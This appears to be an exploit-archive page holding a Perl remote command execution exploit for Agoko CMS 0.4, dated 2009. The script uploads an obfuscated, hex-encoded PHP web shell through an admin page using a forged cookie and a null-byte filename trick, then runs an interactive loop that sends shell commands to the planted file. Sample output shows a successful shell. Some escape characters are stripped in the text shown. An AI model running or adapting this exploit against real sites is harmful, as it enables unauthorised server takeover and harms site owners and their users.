[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Agoko CMS <= 0.4 Remote Command Execution Exploit
# Published : 2009-09-09
# Author : StAkeR
# Previous Title : Joomla Component com_joomloc (id) SQL Injection Vulnerability
# Next Title : Mambo Component com_hestar Remote SQL Injection Vulnerability
#!/usr/bin/perl
print q~
--------------------------------------------------
Agoko CMS <= 0.4 remote commands execution exploit
by staker
mail: staker[at]hotmail[dot]it
--------------------------------------------------
[*] Usage -> perl [xpl.pl] [host] [path]
[*] Example -> perl agk.pl localhost /Agoko
~;
#>-----------<#
#>- Working -<#
#>-----------<#########################################
# staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko #
# #
# -------------------------------------------------- #
# Agoko CMS <= 0.4 remote commands execution exploit #
# by staker #
# mail: staker[at]hotmail[dot]it #
# -------------------------------------------------- #
# #
# [*] Usage -> perl [xpl.pl] [host] [path] #
# [*] Example -> perl agk.pl localhost /Agoko #
# #
# shell already exists. #
# #
# Agoko[shell]:~$ uname -n -r #
# #
# death 2.6.27-7-generic #
#######################################################
use IO::Socket;
use LWP::Simple;
my $host = shift;
my $path = shift || exit(0);
check_shell($host,$path);
sub check_shell() {
my $host = $_[0];
my $path = $_[1] || die $!;
my $packet = "GET /$path/content/shell_vup.php HTTP/1.1rn".
"Host: $hostrn".
"Cookie: bany=love_mern".
"User-Agent: Lynx (textmode)rn".
"Connection: closernrn";
if (give_kt($host,$packet) =~ /bany wtf/i) {
print "[*] shell already exists.n";
load_cmd($host,$path);
}
else {
print "[*] exploiting..n";
inject_shell($host,$path);
}
}
sub inject_shell() {
my ($host,$path) = @_;
my $shell = "x3Cx3Fx70x68x70x20x20x20x20x20x20x65x72x72".
"x6Fx72x5Fx72x65x70x6Fx72x74x69x6Ex67x28x45".
"x5Fx41x4Cx4Cx29x3Bx20x20x20x20x20x20x20x20".
"x20x20x20x20x69x66x20x28x69x73x73x65x74x28".
"x24x5Fx47x45x54x5Bx27x63x6Dx64x27x5Dx29x29".
"x20x20x20x20x20x20x20x20x20x20x70x61x73x73".
"x74x68x72x75x28x73x74x72x69x70x73x6Cx61x73".
"x68x65x73x28x24x5Fx47x45x54x5Bx27x63x6Dx64".
"x27x5Dx29x29x3Bx20x20x20x20x20x20x65x6Cx73".
"x65x20x20x20x20x20x20x20x20x20x64x69x65x28".
"x22x62x61x6Ex79x20x77x74x66x22x29x3Bx20x20".
"x20x20x20x20x3Fx3Ex20";
my $data = "filename=shell_vup.phpx00&text=$shell&Submit=Speichern";
my $packet = "POST /$path/admintools/editpage-2.php HTTP/1.1rn".
"Host: $hostrn".
"User-Agent: Mozilla/4.5 [en] (Win95; U)rn".
"Cookie: bany=love_mern".
"Content-Type: application/x-www-form-urlencodedrn".
"Content-Length: ".length($data)."rn".
"Connection: closernrn".
$data;
if (give_kt($host,$packet) =~ /erfolgreich eingetragen/i)
{
load_cmd($host,$path)
}
else
{
die "[*] Exploit failed.n";
}
}
sub load_cmd() {
my $host = $_[0];
my $path = $_[1];
while (1)
{
print "nAgoko[shell]:~$ ";
chomp (my $cmd = <STDIN>);
exit(0) if $cmd =~ /^(exit|quit|out)+$/i;
getprint("http://$host/$path/content/shell_vup.php?cmd=$cmd");
}
}
sub give_kt() {
my $input = $_[0];
my $heads = $_[1] || die $!;
my $result;
my $socket = IO::Socket::INET->new(
PeerAddr => $input,
PeerPort => 80,
Proto => 'tcp'
) || die $!;
$socket->send($heads);
while (<$socket>) { $result .= $_; }
return $result;
}
# www.Syue.com [2009-09-09]